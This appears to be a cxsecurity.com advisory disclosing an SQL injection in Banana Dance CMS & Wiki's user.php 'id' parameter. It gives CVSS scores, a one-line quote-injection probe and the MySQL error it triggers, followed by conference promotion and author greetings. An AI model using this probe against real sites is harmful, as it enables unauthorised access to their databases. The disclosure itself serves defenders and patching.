Banana Dance CMS & Wiki SQL Injection

2011-10-04 / 2012-09-19
Credit: Aodrulez.
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

+-----------------------+ | Banana Dance CMS+Wiki | +-----------------------+ Vulnerable Web-App : Banana Dance CMS+Wiki Vulnerability : SQLi Author : Aodrulez. Email : f3arm3d3ar@gmail.com Google-Dork : :) Guess it. Tested on : Ubuntu 10.04 Web-App : http://www.doyoubananadance.com/ Download Link : http://www.doyoubananadance.com/functions/dl.php?file=4e84e50f89bf7 +---------+ | Details | +---------+ 1] SQLi Exploit : http://localhost/user.php?id=1'[sqli] Error: ------ Invalid query: SELECT `key`,`value` FROM `bd_user_data` WHERE `user_id`='1'' Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1''' at line 1 +----------+ | MalCon | +----------+ (International Malware Conference) The CFP for MalCon-2011 is ON! If you think you are good enough, try cracking our 'Capture the Mal Challenge-2011' online. Open to everyone! For more details, visit http://malcon.org +-------------------+ | Greetz Fly Out To | +-------------------+ 1] Amforked() : My Mentor. 2] The Blue Genius : My Boss. 3] str0ke (milw0rm) 4] www.orchidseven.com 5] www.malcon.org 6] www.isac.org.in 7] www.nsd.org.in 8] LiquidWorm +-------+ | Quote | +-------+ "Microsoft is not the answer. Microsoft is the question. NO is the answer." - Erik Naggum


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top